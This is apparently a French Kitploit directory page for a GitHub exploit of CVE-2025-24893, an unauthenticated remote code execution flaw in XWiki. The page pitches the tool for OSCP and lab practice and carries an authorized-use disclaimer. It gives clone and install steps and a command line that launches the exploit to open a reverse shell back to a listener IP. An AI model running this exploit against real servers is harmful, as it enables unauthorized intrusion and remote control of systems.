Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24893 — Exploit de type OSCP pour CVE-2025-24893 sur Linux XWiki | Kitploit
Outils/GitHubGitHub/vasilysaint/cve-2025-24893
ExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceLabs et Pratique
GitHubvasilysaint/cve-2025-24893

CVE-2025-24893

Exploit de type OSCP pour CVE-2025-24893 sur Linux XWiki

Voir le dépôt
12il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24893

XWiki Platform est une plateforme wiki générique qui fournit des services d'exécution pour les applications construites sur celle-ci. En raison d'une vulnérabilité dans le point de terminaison SolrSearch, un utilisateur non authentifié peut obtenir une exécution de code à distance arbitraire. Cette vulnérabilité affecte la confidentialité, l'intégrité et la disponibilité de l'ensemble de l'installation XWiki.

CVE: CVE-2025-24893


Démo

Une démonstration de l'exploit est présentée ci-dessous :

Démo terminal

Utilisation

Pour utiliser cet exploit, suivez ces étapes :

  1. Clonez le dépôt : git clone https://github.com/yourusername/CVE-2025-24893.git
  2. Accédez au répertoire cloné : cd CVE-2025-24893
  3. Installez les dépendances requises : pip install requests
  4. Exécutez l'exploit :
root@kitploit:~
./CVE-2025-24893_linux-xwiki-exploit.py  -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
Télécharger l’outil

À propos de cet exploit

Cet exploit démontre la vulnérabilité d'exécution de code à distance décrite dans CVE-2025-24893 et permet à un utilisateur non authentifié d'obtenir un reverse shell sur les installations XWiki basées sur Linux vulnérables.

J'ai initialement développé cet outil pour une utilisation dans des environnements de formation tels que les laboratoires de préparation OSCP et Hack The Box, où je voulais un moyen simple et fiable de reproduire la vulnérabilité. Comme aucun outil existant ne répondait à mes besoins, j'ai décidé d'en créer un.

Bien que CVE-2025-24893 ait été corrigé depuis longtemps dans les versions prises en charge de XWiki, cet exploit ne doit être utilisé que contre des systèmes que vous possédez ou que vous êtes explicitement autorisé à tester.

L'auteur n'assume aucune responsabilité en cas d'utilisation abusive de ce logiciel ou de tout dommage résultant de son utilisation.

Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des évaluations de sécurité autorisées.

Utilisez-le uniquement contre des systèmes que vous possédez ou que vous êtes explicitement autorisé à tester. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce logiciel ou de tout dommage résultant de son utilisation.

Contribuer

Les contributions sont les bienvenues.

Si vous rencontrez des bugs, avez des suggestions d'amélioration ou souhaitez ajouter la prise en charge de charges utiles, de plateformes ou de fonctionnalités supplémentaires, n'hésitez pas à ouvrir une issue ou à soumettre une pull request.

Les retours constructifs, les rapports de test et les contributions de code sont grandement appréciés.